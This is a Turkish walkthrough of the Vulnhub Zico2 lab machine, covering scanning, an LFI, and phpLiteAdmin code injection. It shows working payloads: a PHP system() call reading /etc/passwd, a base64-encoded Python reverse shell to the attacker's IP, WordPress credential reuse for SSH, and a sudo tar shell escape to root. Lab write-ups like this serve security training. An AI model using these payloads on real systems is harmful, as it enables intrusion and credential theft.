Makine Hakkında Bilgiler
Açıklama:
Doesn't work with VMware. Virtualbox only.
Vulnhub Sayfası:
https://www.vulnhub.com/entry/zico2-1,210/
İndirme Sayfası: https://download.vulnhub.com/zico/zico2.ova
Walkthrough
Makinenin ip adresini tespit edelim.
┌──(root💀kali)-[/home/kali]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fea6:1f86 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:a6:1f:86 txqueuelen 1000 (Ethernet)
RX packets 11 bytes 4438 (4.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11 bytes 1142 (1.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root💀kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:a6:1f:86, IPv4: 10.0.2.15
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.2.1 52:54:00:12:35:00 QEMU
10.0.2.2 52:54:00:12:35:00 QEMU
10.0.2.3 08:00:27:1f:e3:ff PCS Systemtechnik GmbH
10.0.2.6 08:00:27:81:10:28 PCS Systemtechnik GmbH
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.765 seconds (92.59 hosts/sec). 4 responded
nmap taraması ile devam edelim.
┌──(root💀kali)-[/home/kali]
└─# nmap -p- -A -T4 10.0.2.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-16 18:45 EDT
Nmap scan report for 10.0.2.6
Host is up (0.00085s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 32890/udp6 status
| 100024 1 44197/tcp status
| 100024 1 51071/udp status
|_ 100024 1 56680/tcp6 status
44197/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:81:10:28 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.85 ms 10.0.2.6
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.99 seconds
- portu severiz. nikto ve dirb ile devam edelim.
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# dirb http://10.0.2.6/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jun 16 19:26:57 2021
URL_BASE: http://10.0.2.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.0.2.6/ ----
+ http://10.0.2.6/cgi-bin/ (CODE:403|SIZE:284)
==> DIRECTORY: http://10.0.2.6/css/
==> DIRECTORY: http://10.0.2.6/dbadmin/
==> DIRECTORY: http://10.0.2.6/img/
+ http://10.0.2.6/index (CODE:200|SIZE:7970)
+ http://10.0.2.6/index.html (CODE:200|SIZE:7970)
==> DIRECTORY: http://10.0.2.6/js/
+ http://10.0.2.6/LICENSE (CODE:200|SIZE:1094)
+ http://10.0.2.6/package (CODE:200|SIZE:789)
+ http://10.0.2.6/server-status (CODE:403|SIZE:289)
+ http://10.0.2.6/tools (CODE:200|SIZE:8355)
==> DIRECTORY: http://10.0.2.6/vendor/
+ http://10.0.2.6/view (CODE:200|SIZE:0) http://10.0.2.6/dbadmin/ adresi dikkat çekici. Bu yüzden tarayıcı üzerinden incelemeye başladım.
http://10.0.2.6/view.php?page= adresi dikkatimi çekti ve lfi olabileceğini düşündüm. Bunun üzerine yazmaya hala devam ettiğim ancak sadece makine çözerken uğraştığım github projemi kullandım.
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# python3 lfi-project.py 130 ⨯
[*] Proje çalışırken bir proxy sunucusu kullanılması tavsiye edilmektedir. Burp gibi bir araç kullanabilirsiniz. Default ayarlamaları değiştirmek için kodları okuyunuz. Eğer ayarlamalarını hazır değilse 'q' ile çıkış yapabilirsiniz.
[*] Hedef URL'i giriniz:
http://10.0.2.6/view.php?page=
Lütfen LFI türünü seçiniz:
1- Default
2- Filter
1
[*] Terminalde kayan anlamsız yazılar ister misiniz?(e/h)h
[*] Lütfen kaç kere ../ uygulanmasını istediğini belirtiniz. (Örn: 8)4
Projenin kaynak kodlarına baktığınızda proxy kullanılmaktadır. Burp ile çıktılara baktığımızda lfi olduğunu anlayabiliriz. Ancak buradan RCE yapamadım. İleride burdan belki yararlanabilirim diye düşündüm ve bir kenara not aldım.
Sayfa üzerinde incelemelerime devam ederken admin şifresi ile http://10.0.2.6/dbadmin/test_db.php? adresine giriş yaptım. Proje ile ilgili exploit ararken aşağıdaki sonuçları buldum.
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# searchsploit phpLiteAdmin
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
phpLiteAdmin - 'table' SQL Injection | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | php/webapps/39714.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[/home/kali/Desktop/lfi-project]
└─# cd ..
┌──(root💀kali)-[/home/kali/Desktop]
└─# locate php/webapps/24044.txt
/usr/share/exploitdb/exploits/php/webapps/24044.txt
┌──(root💀kali)-[/home/kali/Desktop]
└─# cat /usr/share/exploitdb/exploits/php/webapps/24044.txt
# Exploit Title: phpliteadmin <= 1.9.3 Remote PHP Code Injection Vulnerability
# Google Dork: inurl:phpliteadmin.php (Default PW: admin)
# Date: 01/10/2013
# Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt
# Vendor Homepage: http://code.google.com/p/phpliteadmin/
# Vendor Status: Informed
# Software Link: http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip
# Version: 1.9.3
# Tested on: Windows and Linux
Description:
phpliteadmin.php#1784: 'Creating a New Database' =>
phpliteadmin.php#1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.',
An Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.
Proof of Concept:
1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ
2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ
3. Now we run hack.php
Done!
Proof: http://goo.gl/ZqPVL
Sırasıyla buradaki adımları uyguladım. İlk olarak <?php system("which nc; cat /etc/passwd; which python;"); ?> payloadını kullandığımda http://10.0.2.6/view.php?page=../../../../usr/databases/hack.php adresinde
SQLite format 3@
-â! €€~_tabletesttestCREATE TABLE 'test' ('cmd' TEXT default '/bin/nc root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false ntp:x:103:108::/home/ntp:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin vboxadd:x:999:1::/var/run/vboxadd:/bin/false statd:x:105:65534::/var/lib/nfs:/bin/false mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false zico:x:1000:1000:,,,:/home/zico:/bin/bash /usr/bin/python ")')
sonucunu aldım. Güzel php kodları ve linux komutları çalıştırabiliyoruz. Ayrıca görüldüğü üzere /usr/bin/python yani sistemde python'ında yüklü olduğunu görüyoruz. Bunun üzerine base64 araclığı ile bir python reverse ayarlamaya karar verdim. searchexploit'de bulduğum doküman aracılığı ile bu sefer aşağıdaki payload kullandım.
<?php system(base64_decode("cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4yLjE1IiwxODIyKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9iYXNoIikn")); ?>
Yukarıdaki kodun açıklaması kısaca:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.15",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'Bu esnada tabiki de 1822 de bir dinleme noktası başlattım ve reverse shell alabildim.
┌──(root💀kali)-[/home/kali/Desktop]
└─# nc -lvp 1822
listening on [any] 1822 ...
10.0.2.6: inverse host lookup failed: Unknown host
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.6] 58813
www-data@zico:/var/www$ ls
ls
LICENSE css gulpfile.js index.html less tools.html view.php
README.md dbadmin img js package.json vendor
İçeride incelemeler yaptıktan sonra wordpress config dosyası buldum ve oradaki kullanıcı bilgilerini ssh için denedim.
www-data@zico:/tmp$ cd /home
cd /home
www-data@zico:/home$ ls
ls
zico
www-data@zico:/home$ cd zico
cd zico
www-data@zico:/home/zico$ ls
ls
bootstrap.zip to_do.txt zico-history.tar.gz
joomla wordpress
startbootstrap-business-casual-gh-pages wordpress-4.8.zip
www-data@zico:/home/zico$ cat to_do*
cat to_do*
try list:
- joomla
- bootstrap (+phpliteadmin)
- wordpress
www-data@zico:/home/zico$ cd wordpress
cd wordpress
www-data@zico:/home/zico/wordpress$ ls
ls
index.php wp-blog-header.php wp-includes wp-settings.php
license.txt wp-comments-post.php wp-links-opml.php wp-signup.php
readme.html wp-config.php wp-load.php wp-trackback.php
wp-activate.php wp-content wp-login.php xmlrpc.php
wp-admin wp-cron.php wp-mail.php
www-data@zico:/home/zico/wordpress$ head wp-config.php -n 40
head wp-config.php -n 40
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');
/** MySQL database username */
define('DB_USER', 'zico');
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
/** MySQL hostname */
define('DB_HOST', 'zico');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
www-data@zico:/home/zico/wordpress$┌──(root💀kali)-[/home/kali/Desktop]
└─# ssh [email protected]
The authenticity of host '10.0.2.6 (10.0.2.6)' can't be established.
ECDSA key fingerprint is SHA256:+zgKqxyYlTBxVO0xtTVGBokreS9Zr71wQGvnG/k2igw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.6' (ECDSA) to the list of known hosts.
[email protected]'s password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
zico@zico:~$ whoami
zico
İçeride incelemeler yaparken aşağıdaki sonucu buldum.
zico@zico:~$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zipBunun üzerine /bin/tar ile nasıl root olabilirim diye internet üzerinden araştırmalar yapmaya başladım ve bu adresi buldum. Kısaca aşağıdaki komutlar aracılığı ile root olabiliriz.
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
This only works for GNU tar.
tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'
This only works for GNU tar. It can be useful when only a limited command argument injection is available.
TF=$(mktemp)
echo '/bin/sh 0<&1' > "$TF"
tar cf "$TF.tar" "$TF"
tar xf "$TF.tar" --to-command sh
rm "$TF"*Hadi deneyelim!
zico@zico:~$ sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
/bin/tar: Removing leading `/' from member names
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
#
İlk Yorumu Siz Yapın